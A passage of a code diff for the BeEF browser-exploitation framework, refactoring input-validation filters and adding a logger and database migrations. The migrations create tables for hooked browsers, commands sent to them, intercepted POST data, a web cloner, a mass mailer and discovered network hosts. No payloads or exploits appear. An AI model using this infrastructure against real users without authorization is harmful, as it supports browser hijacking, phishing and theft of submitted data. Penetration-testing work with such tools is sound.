-        require 'extensions/'+ext+'/extension.rb'
+      if File.exist? "#{$root_dir}/extensions/#{ext}/extension.rb"
+        require "#{$root_dir}/extensions/#{ext}/extension.rb"
        print_debug "Loaded extension: '#{ext}'"
-        BeEF::Core::Configuration.instance.set('beef.extension.'+ext+'.loaded', true)
+        BeEF::Core::Configuration.instance.set "beef.extension.#{ext}.loaded", true
        return true
      end
      print_error "Unable to load extension '#{ext}'"
-      return false
+      false
+    rescue => e
+      print_error "Unable to load extension '#{ext}':"
+      print_more e.message
    end
  end
 end
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -9,13 +9,13 @@ module BeEF
    # Returns configuration of all enabled extensions
    # @return [Array] an array of extension configuration hashes that are enabled
    def self.get_enabled
-      return BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
    end

    # Returns configuration of all loaded extensions
    # @return [Array] an array of extension configuration hashes that are loaded
    def self.get_loaded
-      return BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
    end

    # Load all enabled extensions
@@ -23,12 +23,10 @@ module BeEF
    def self.load
      BeEF::Core::Configuration.instance.load_extensions_config
      self.get_enabled.each { |k,v|
-        BeEF::Extension.load(k)
+        BeEF::Extension.load k
      }
      # API post extension load
-      BeEF::API::Registrar.instance.fire(BeEF::API::Extensions, 'post_load')
+      BeEF::API::Registrar.instance.fire BeEF::API::Extensions, 'post_load'
    end
-
  end
 end
-
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,154 +7,150 @@ module BeEF
 module Filters

  # Check if the string is not empty and not nil
-  # @param [String] str String for testing
-  # @return [Boolean] Whether the string is not empty
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether the string is not empty
  def self.is_non_empty_string?(str)
    return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if str.empty?
    true
  end

  # Check if only the characters in 'chars' are in 'str'
-  # @param [String] chars List of characters to match
-  # @param [String] str String for testing
-  # @return [Boolean] Whether or not the only characters in str are specified in chars
+  #   @param [String] chars List of characters to match
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether or not the only characters in str are specified in chars
  def self.only?(chars, str)
    regex = Regexp.new('[^' + chars + ']')
    regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
  end

  # Check if one or more characters in 'chars' are in 'str'
-  # @param [String] chars List of characters to match
-  # @param [String] str String for testing
-  # @return [Boolean] Whether one of the characters exists in the string
+  #   @param [String] chars List of characters to match
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether one of the characters exists in the string
  def self.exists?(chars, str)
    regex = Regexp.new(chars)
    not regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
  end

  # Check for null char
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has a null character
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has a null character
  def self.has_null? (str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    exists?('\x00', str)
  end

  # Check for non-printable char
-  # @param [String] str String for testing
-  # @return [Boolean] Whether or not the string has non-printable characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether or not the string has non-printable characters
  def self.has_non_printable_char?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    not only?('[:print:]', str)
  end

  # Check if num characters only
-  # @param [String] str String for testing
-  # @return [Boolean] If the string only contains numbers
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string only contains numbers
  def self.nums_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    only?('0-9', str)
  end

  # Check if valid float
-  # @param [String] str String for float testing
-  # @return [Boolean] If the string is a valid float
+  #   @param [String] str String for float testing
+  #   @return [Boolean] If the string is a valid float
  def self.is_valid_float?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not only?('0-9\.', str)
+    return false unless is_non_empty_string?(str)
+    return false unless only?('0-9\.', str)
    not (str =~ /^[\d]+\.[\d]+$/).nil?
  end

  # Check if hex characters only
-  # @param [String] str String for testing
-  # @return [Boolean] If the string only contains hex characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string only contains hex characters
  def self.hexs_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    only?('0123456789ABCDEFabcdef', str)
  end

  # Check if first character is a number
-  # @param [String] String for testing
-  # @return [Boolean] If the first character of the string is a number
+  #   @param [String] String for testing
+  #   @return [Boolean] If the first character of the string is a number
  def self.first_char_is_num?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    not (str =~ /^\d.*/).nil?
  end

  # Check for space characters: \t\n\r\f
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has a whitespace character
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has a whitespace character
  def self.has_whitespace_char?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    exists?('\s', str)
  end

  # Check for non word characters: a-zA-Z0-9
-  # @param [String] str String for testing
-  # @return [Boolean] If the string only has alphanums
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string only has alphanums
  def self.alphanums_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    only?("a-zA-Z0-9", str)
  end

-  # @overload self.is_valid_ip?(version, ip)
-  #   Checks if the given string is a valid IP address
-  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
+  # @overload self.is_valid_ip?(ip, version)
+  # Checks if the given string is a valid IP address
  #   @param [String] ip string to be tested
+  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
  #   @return [Boolean] true if the string is a valid IP address, otherwise false
  #
  # @overload self.is_valid_ip?(ip)
-  #   Checks if the given string is either a valid IPv4 or IPv6 address
+  # Checks if the given string is either a valid IPv4 or IPv6 address
  #   @param [String] ip string to be tested
  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
-  def self.is_valid_ip?(version = :both, ip)
-    valid = false
-
-    if is_non_empty_string?(ip)
-      valid = case version.inspect.downcase
-        when /^:ipv4$/
-          ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
-            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
-        when /^:ipv6$/
-          ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
-            ([0-9a-f]{1,4}:){1,7}:|
-            ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
-            ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
-            ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
-            ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
-            ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
-            [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
-            :((:[0-9a-f]{1,4}){1,7}|:)|
-            fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
-            ::(ffff(:0{1,4}){0,1}:){0,1}
-            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
-            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
-            ([0-9a-f]{1,4}:){1,4}:
-            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
-            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
-        when /^:both$/
-          is_valid_ip?(:ipv4, ip) || is_valid_ip?(:ipv6, ip)
-      end ? true : false
-    end
+  def self.is_valid_ip?(ip, version = :both)
+    return false unless is_non_empty_string?(ip)
+    valid = case version.inspect.downcase
+      when /^:ipv4$/
+        ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
+          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
+      when /^:ipv6$/
+        ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
+          ([0-9a-f]{1,4}:){1,7}:|
+          ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
+          ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
+          ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
+          ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
+          ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
+          [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
+          :((:[0-9a-f]{1,4}){1,7}|:)|
+          fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
+          ::(ffff(:0{1,4}){0,1}:){0,1}
+          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
+          ([0-9a-f]{1,4}:){1,4}:
+          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
+      when /^:both$/
+        is_valid_ip?(ip, :ipv4) || is_valid_ip?(ip, :ipv6)
+    end ? true : false

    valid
  end

  # Checks if the given string is a valid private IP address
-  # @param [String] ip string for testing
-  # @return [Boolean] true if the string is a valid private IP address, otherwise false
-  # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8,
-  #       but does not include local-link addresses.
+  #   @param [String] ip string for testing
+  #   @return [Boolean] true if the string is a valid private IP address, otherwise false
+  # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8, but does not include local-link addresses.
  def self.is_valid_private_ip?(ip)
    return false unless is_valid_ip?(ip)
    return ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
  end

  # Checks if the given string is a valid TCP port
-  # @param [String] port string for testing
-  # @return [Boolean] true if the string is a valid TCP port, otherwise false
+  #   @param [String] port string for testing
+  #   @return [Boolean] true if the string is a valid TCP port, otherwise false
  def self.is_valid_port?(port)
    valid = false
    valid = true if port.to_i > 0 && port.to_i < 2**16
@@ -162,10 +158,9 @@ module Filters
  end

  # Checks if string is a valid domain name
-  # @param [String] domain string for testing
-  # @return [Boolean] If the string is a valid domain name
-  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of
-  #       TLD's is not static.
+  #   @param [String] domain string for testing
+  #   @return [Boolean] If the string is a valid domain name
+  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of TLD's is not static.
  def self.is_valid_domain?(domain)
    return false unless is_non_empty_string?(domain)
    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
@@ -173,32 +168,30 @@ module Filters
  end

  # Check for valid browser details characters
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser details characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has valid browser details characters
  # @note This function passes the \302\256 character which translates to the registered symbol (r)
  def self.has_valid_browser_details_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    not (str =~ /[^\w\d\s()-.,;:_\/!\302\256]/).nil?  
  end  

  # Check for valid base details characters
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has only valid base characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has only valid base characters
  # @note This is for basic filtering where possible all specific filters must be implemented
  # @note This function passes the \302\256 character which translates to the registered symbol (r)
  def self.has_valid_base_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    (str =~ /[^\302\256[:print:]]/).nil? 
  end  

  # Verify the yes and no is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is either 'yes' or 'no'
-  # @todo Confirm this is case insensitive
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string is either 'yes' or 'no'
  def self.is_valid_yes_no?(str)
    return false if has_non_printable_char?(str)
-    return false if str !~ /^(Yes|No)$/
-    return false if str.length > 200
+    return false if str !~ /\A(Yes|No)\z/i
    true
  end

--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,28 +10,17 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser name characters
  def self.is_valid_browsername?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if str.length > 2
    return false if has_non_printable_char?(str)
    true
  end

-  # Check the browser type value - for example, {"FF5":true,"FF":true} & {"S":true}
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser type characters
-  def self.is_valid_browsertype?(str)
-    return false if not is_non_empty_string?(str)
-    return false if str.length < 10
-    return false if str.length > 500 #CxF - had to increase this because the Chrome detection JSON String is getting bigger.
-    return false if has_non_printable_char?(str)
-    true
-  end
-
  # Check the Operating System name value - for example, 'Windows XP'
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid Operating System name characters
  def self.is_valid_osname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length < 2
    true
@@ -41,7 +30,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid Hardware name characters
  def self.is_valid_hwname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length < 2
    true
@@ -77,7 +66,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser / ua string characters
  def self.is_valid_browserstring?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 300      
    true
@@ -87,33 +76,17 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid cookie characters
  def self.is_valid_cookies?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 2000
    true
  end

-  # Verify the screen size is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid screen size characters
-  def self.is_valid_screen_size?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
-
-  # Verify the window size is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid window size characters
-  def self.is_valid_window_size?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
-
  # Verify the system platform is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid system platform characters
  def self.is_valid_system_platform?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
@@ -123,6 +96,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid date stamp characters
  def self.is_valid_date_stamp?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
@@ -132,7 +106,27 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid CPU type characters
  def self.is_valid_cpu?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
+  # Verify the memory string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid memory type characters
+  def self.is_valid_memory?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
+  # Verify the GPU type string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid GPU type characters
+  def self.is_valid_gpu?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
@@ -144,9 +138,9 @@ module Filters
  # @note This string can be empty if there are no browser plugins
  # @todo Verify if the ruby version statement is still necessary
  def self.is_valid_browser_plugins?(str)
-    return true if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if str.length > 1000
-    if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
+    if str.encoding === Encoding.find('UTF-8')
      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
    else
      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -11,26 +11,17 @@ module Filters
  # @return [Boolean] If the string has valid path characters
  def self.is_valid_path_info?(str)
    return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if has_non_printable_char?(str)
    true
  end

-  # Check if the command id valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is a valid command id
-  def self.is_valid_command_id?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not nums_only?(str)   
-    true
-  end
-
  # Check if the session id valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid hook session id characters
  def self.is_valid_hook_session_id?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not has_valid_key_chars?(str) 
+    return false unless is_non_empty_string?(str)
+    return false unless has_valid_key_chars?(str) 
    true
  end

@@ -38,8 +29,8 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid command module datastore key characters
  def self.is_valid_command_module_datastore_key?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not has_valid_key_chars?(str)      
+    return false unless is_non_empty_string?(str)
+    return false unless has_valid_key_chars?(str)      
    true
  end

@@ -48,7 +39,7 @@ module Filters
  # @return [Boolean] If the string has valid command module datastore param characters
  def self.is_valid_command_module_datastore_param?(str)
    return false if has_null?(str)
-    return false if not has_valid_base_chars?(str)
+    return false unless has_valid_base_chars?(str)
    true
  end

@@ -56,8 +47,8 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid key characters
  def self.has_valid_key_chars?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not has_valid_base_chars?(str)
+    return false unless is_non_empty_string?(str)
+    return false unless has_valid_base_chars?(str)
    true
  end

@@ -66,9 +57,9 @@ module Filters
  # @return [Boolean] If the sting has valid param characters
  def self.has_valid_param_chars?(str)
    return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if str.empty?
-    return false if not (str =~ /[^\w_\:]/).nil?
+    return false unless (str =~ /[^\w_\:]/).nil?
    true
  end

--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,7 +10,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid hostname
  def self.is_valid_hostname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 255
    return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$/).nil?
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,7 +10,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid page title
  def self.is_valid_pagetitle?(str)
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if has_non_printable_char?(str)
    return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
    true
@@ -20,7 +20,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid referrer
  def self.is_valid_pagereferrer?(str)
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if has_non_printable_char?(str)
    return false if str.length > 350
    true
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,14 +10,14 @@ module BeEF
    # @param [String] sid hooked browser session id string
    # @return [BeEF::Core::Models::HookedBrowser] returns the associated Hooked Browser
    def self.get_by_session(sid)
-      BeEF::Core::Models::HookedBrowser.first(:session => sid)
+      BeEF::Core::Models::HookedBrowser.where(:session => sid).first
    end

    # Get hooked browser by id
    # @param [Integer] id hooked browser database id
    # @return [BeEF::Core::Models::HookedBrowser] returns the associated Hooked Browser
    def self.get_by_id(id)
-      BeEF::Core::Models::HookedBrowser.first(:id => id)
+      BeEF::Core::Models::HookedBrowser.find(id)
    end

  end
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,7 +7,14 @@
 # @note Include here all the gems we are using
 require 'rubygems'
 require 'bundler/setup'
+
+# For some reason, on Ruby 2.5+, msgpack needs to be loaded first,
+# else metasploit integration dies due to undefined `to_msgpack`.
+# Works fine on Ruby 2.4
+require 'msgpack'
+
 Bundler.require(:default)
+
 require 'cgi'
 require 'yaml'
 require 'singleton'
@@ -15,8 +22,26 @@ require 'ipaddr'
 require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
-require 'rubydns'
+require 'eventmachine'
+require 'thin'
+require 'rack'
+require 'em-websocket'
+require 'uglifier'
+require 'execjs'
+require 'ansi'
+require 'term/ansicolor'
+require 'json'
+require 'otr-activerecord'
+require 'parseconfig'
+require 'erubis'
 require 'mime/types'
+require 'optparse'
+require 'resolv'
+require 'digest'
+require 'zip'
+require 'logger'
+# @note Logger
+require 'core/logger'

 # @note Include the filters
 require 'core/filters'
--- a/core/logger.rb
+++ b/core/logger.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+#
+# @note log to file
+#
+module BeEF
+  class << self
+    attr_writer :logger
+
+    def logger
+        @logger ||= Logger.new("#{$home_dir}/beef.log").tap do |log|
+        log.progname = self.name
+        log.level = Logger::WARN
+      end
+    end
+  end
+end
--- a/core/main/ar-migrations/001_create_command_modules.rb
+++ b/core/main/ar-migrations/001_create_command_modules.rb
@@ -0,0 +1,12 @@
+class CreateCommandModules < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :command_modules do |t|
+			t.text :name
+			t.text :path
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/002_create_hooked_browsers.rb
+++ b/core/main/ar-migrations/002_create_hooked_browsers.rb
@@ -0,0 +1,19 @@
+class CreateHookedBrowsers < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :hooked_browsers do |t|
+            t.text :session
+			t.text :ip
+			t.text :firstseen
+			t.text :lastseen
+			t.text :httpheaders
+			t.text :domain
+			t.integer :port
+			t.integer :count
+			t.boolean :is_proxy
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/003_create_logs.rb
+++ b/core/main/ar-migrations/003_create_logs.rb
@@ -0,0 +1,14 @@
+class CreateLogs < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :logs do |t|
+			t.text :logtype
+			t.text :event
+			t.datetime :date
+			t.references :hooked_browser
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/004_create_commands.rb
+++ b/core/main/ar-migrations/004_create_commands.rb
@@ -0,0 +1,16 @@
+class CreateCommands < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :commands do |t|
+            t.references :command_module
+            t.references :hooked_browser
+			t.text :data
+			t.datetime :creationdate
+			t.text :label
+			t.boolean :instructions_sent, default: false
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/005_create_results.rb
+++ b/core/main/ar-migrations/005_create_results.rb
@@ -0,0 +1,15 @@
+class CreateResults < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :results do |t|
+            t.references :command
+            t.references :hooked_browser
+			t.datetime :date
+			t.integer :status
+            t.text :data
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/006_create_option_caches.rb
+++ b/core/main/ar-migrations/006_create_option_caches.rb
@@ -0,0 +1,12 @@
+class CreateOptionCaches < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :option_caches do |t|
+			t.text :name
+			t.text :value
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/007_create_browser_details.rb
+++ b/core/main/ar-migrations/007_create_browser_details.rb
@@ -0,0 +1,13 @@
+class CreateBrowserDetails < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :browser_details do |t|
+			t.text :session_id
+			t.text :detail_key
+			t.text :detail_value
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/008_create_executions.rb
+++ b/core/main/ar-migrations/008_create_executions.rb
@@ -0,0 +1,17 @@
+class CreateExecutions < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :executions do |t|
+            t.text :session_id
+			t.integer :mod_count
+			t.integer :mod_successful
+			t.text :mod_body
+			t.text :exec_time
+			t.text :rule_token
+			t.boolean :is_sent
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/009_create_rules.rb
+++ b/core/main/ar-migrations/009_create_rules.rb
@@ -0,0 +1,20 @@
+class CreateRules < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :rules do |t|
+			t.text :name
+			t.text :author
+			t.text :browser
+			t.text :browser_version
+			t.text :os
+			t.text :os_version
+			t.text :modules
+			t.text :execution_order
+			t.text :execution_delay
+			t.text :chain_mode
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/010_create_interceptor.rb
+++ b/core/main/ar-migrations/010_create_interceptor.rb
@@ -0,0 +1,12 @@
+class CreateInterceptor < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :interceptors do |t|
+            t.text :ip
+            t.text :post_data
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/011_create_web_cloner.rb
+++ b/core/main/ar-migrations/011_create_web_cloner.rb
@@ -0,0 +1,12 @@
+class CreateWebCloner < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :web_cloner do |t|
+            t.text :uri
+            t.text :mount
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/012_create_mass_mailer.rb
+++ b/core/main/ar-migrations/012_create_mass_mailer.rb
@@ -0,0 +1,11 @@
+class CreateMassMailer < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :mass_mailer do |t|
+            #todo fields
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/013_create_network_host.rb
+++ b/core/main/ar-migrations/013_create_network_host.rb
@@ -0,0 +1,17 @@
+class CreateNetworkHost < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :network_hosts do |t|
+            t.references :hooked_browser
+            t.text :ip
+            t.text :hostname
+            t.text :ntype
+            t.text :os
+            t.text :mac
+            t.text :lastseen
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/014_create_network_service.rb
+++ b/core/main/ar-migrations/014_create_network_service.rb
@@ -0,0 +1,15 @@
+class CreateNetworkService < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :network_services do |t|
+            t.references :hooked_browser
+            t.text :proto
+            t.text :ip
+            t.text :port
+            t.text :ntype
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/015_create_http.rb
+++ b/core/main/ar-migrations/015_create_http.rb
